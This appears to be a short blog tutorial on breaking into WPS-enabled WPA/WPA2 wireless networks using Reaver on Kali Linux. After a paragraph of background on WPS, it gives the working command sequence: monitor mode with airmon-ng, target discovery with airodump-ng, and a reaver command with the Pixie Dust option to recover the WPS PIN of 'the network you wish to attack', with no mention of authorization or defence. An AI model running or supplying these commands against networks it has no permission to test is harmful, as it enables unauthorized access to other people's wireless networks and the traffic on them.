Cracking WPS Enabled WPA/WPA2 networks with Reaver

Cracking WPS Enabled WPA/WPA2 networks with Reaver

Wi-Fi Protected Setup (WPS; originally, Wi-Fi Simple Config) is a network security standard to create a secure wireless home network.

Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases.

Unfortunately, despite being quite a new-ish technology, it is quite simple to attack WPS. This example will be using Kali Linux and a USB Network card that supports monitor mode.

Start by enabling Monitor mode on the network adapter:

airmon-ng start wlan0
airodump-ng wlan0mon

The airodump command should show you wireless networks currently in range. Note down the BSSID of the network you wish to attack and start the reaver attack:

reaver -i wlan0mon -b 00:00:00:00:00:00 –vvv -K 1

Reaver will now start the attack and hopefully display the WPS pin once it has been found.

Leave a Comment